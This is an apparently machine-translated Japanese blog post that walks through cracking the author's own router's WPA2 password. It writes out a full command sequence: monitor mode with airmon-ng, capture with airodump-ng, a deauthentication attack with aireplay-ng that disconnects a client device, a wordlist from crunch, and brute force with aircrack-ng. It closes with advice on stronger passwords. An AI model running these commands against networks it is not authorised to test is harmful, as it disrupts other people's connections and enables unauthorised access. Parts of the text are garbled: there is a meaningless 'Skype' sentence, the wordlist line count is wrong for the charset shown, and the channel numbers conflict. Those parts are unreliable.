私はちょうど試しに私の新しいルーターをハックして楽しんでみることにしました。 ネタバレ》 本当に簡単でした。
そこで、テストをするために、有名なLinuxディストリビューションを試しました。 Kali Linuxです。
私は Kali Linux をデュアルブートでインストールしましたが、Live USB モードや VirtualBox などの仮想マシンで使用することもできます。 この攻撃は、いくつかのフェーズで行われます。
- ネットワークカードの準備
- Wi-fi ターゲットの分析
- Wi-fi 上のデバイスを切断して WPA ハンドシェイク (Wi-fi ネットワークへの接続) をキャプチャ
- WPA ハンドシェイク パスワード ブルートフォースによる解読
準備
最初のステップはセットしたネットワークカードのモニタ モードをアクティブ化することです。 これを行うには、airmong-ng
で利用可能なネットワークカードをリストアップします。 ターミナルを開き、
airmon-ng
表示されない場合は、ネットワークカードに互換性がありません。 購入する必要があります (USB Wi-fi ドングルで十分です)。
このケースでは、wlan0 ネットワーク カードが使用できることを確認しました。 そこで、次のコマンドでモニタ モードを有効にします:
airmon-ng start wlan0
ここから、ネットワーク カード wlan0 は使用できなくなり (インターネットができなくなり)、新しいネットワーク カードが表示されるようになります。 これは、ifconfig
を実行することで見つけることができます。 私の場合は、wlan0monです・・・。
Analysis
ここで、airodump
:
airodump-ng wlan0mon
で私たちの周りを循環するネットワークパケットを嗅ぐことができます
このコマンドは、以下のWi-fiの追加情報を検索してくれます。
- BSSID
- チャンネル
- 認証モード
- ESSID、ルーター名
すべての行の中に、私のネットワークが表示されています。
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 18:D6:C7:85:7E:A0 -45 6 0 0 2 54e WPA2 CCMP PSK TP-LINK_7EA0
WPAハンドシェイクをキャプチャする
WPAハンドシェイクは、デバイスがWi-fiに接続されたときに行われるものです。
- Wi-fiを嗅いで、デバイスがWi-fiに接続するのを待つ
- Wi-fiを嗅いで切断を起こし、デバイスが再接続するのを待つ
テストのために、既に接続しているブラックベリーを切断してみることにしましょう。
Wi-fi Scan
そこで、airodump-ng
コマンドとオプションでネットワークをスキャンします:
-
-c
オプションでチャネル -
--bssid
、私のルーターのIDを指定します。 -
w
出力ファイルを格納するディレクトリ
airodump-ng -c 10 --bssid 18:D6:C7:85:7E:A0 -w tplink wlan0mon
このコマンドをバックグラウンドで放置すると、3つのファイルが生成され、そのうち1つはxmlタイプになります。 このファイルには wi-fi に接続されたデバイスの詳細が含まれているため、私たちはこのファイルに興味を持ちました。 このファイルを開くと、私のBlackberryの情報をとても簡単に見つけることができます。 以下はファイルの抜粋です:
<client-mac>94:EB:CD:25:E0:C1</client-mac><client-manuf>BlackBerry RTS</client-manuf>
Disconnection
これですべての情報が揃いましたので、Blackberryの切断を要求するパケットを送信してみます。
-
-0
をパラメータとして使用し、認証解除シグナルを送信します。 -
-a
Wi-fi の BSSID へ。 -
-c
ターゲットの BSSID - 使用したネットワークカード
aireplay-ng -0 2 -a 18:D6:C7:85:7E:A0 -c 94:EB:CD:25:E0:C1 wlan0mon
デバイスが自動的に切断し再接続するようになります。
Cracking
暗号化されたWPAパスワードを含むパケットを取得したので、一致するものを見つけるまでいくつかの組み合わせをテストする必要があります:これはbruteforceと呼ばれます。 最もよく使われるパスワードの数ギガバイトのテキストファイルを見つけることができます。 私の場合、Wi-fiのパスワードが8桁であることを知っています。 そこで、crunch
コマンドを使って、可能な限りの組み合わせを生成してみることにする。 crunch
はいくつかのパラメータを使用します:
- 最小長 (8)
- 最大長 (8)
- 使用する文字 (0123…9)
それをすべて passwords.C に送信しています。txt file.
crunch 8 8 12345678 > passwords.txt
数秒で、43046721行、369MBのファイルを取得しました!
The bruteforce
私たちは行動を起こしているのです。 ここでは、パスワードをブルートフォースするつもりです。 これを行うには、パスワードを1つずつ暗号化し、キャプチャしたネットワークパケットのパスワードと一致するかどうかをチェックするaircrack-ng
を使用します(長くなるので、コーヒーでも飲んでください)。
aircrack-ng -a2 -b 18:D6:C7:85:7E:A0 -w /root/Desktop/passwords.txt /root/Desktop/tplink.cap
そしてしばらくすると:
結論
この小さなテストを通して、WPA パスワードの Wi-fi を「解読」することは非常に簡単だということが分かりました。 また、”Skype “を利用することで、”Skype “の利用が可能になります。 しかし、いくつかの簡単なルールを適用することで、この種のリスクを回避することができます。
使用したパスワードは、わずか8文字の数字であることを忘れないでください。 組み合わせの数は、380MBのファイルに収まるものでした。 もしパスワードにアルファベットが含まれていたら、辞書はテラバイトを越えていたでしょう。 ブルートフォースは確実に数週間続いただろう。
だから、より複雑なパスワードを適用することで、リスクを減らすことができるのである。
さらに、Wi-Fi信号を建物全体で見えないように調整することも可能です。
できるだけ早く、やはり最も安全なソリューションであるイーサネットケーブルを使用します。
Links
- 元の記事
- Aircrack-ng
- Kali Linux|侵入テストおよび倫理的ハッキング Linux ディストリビューション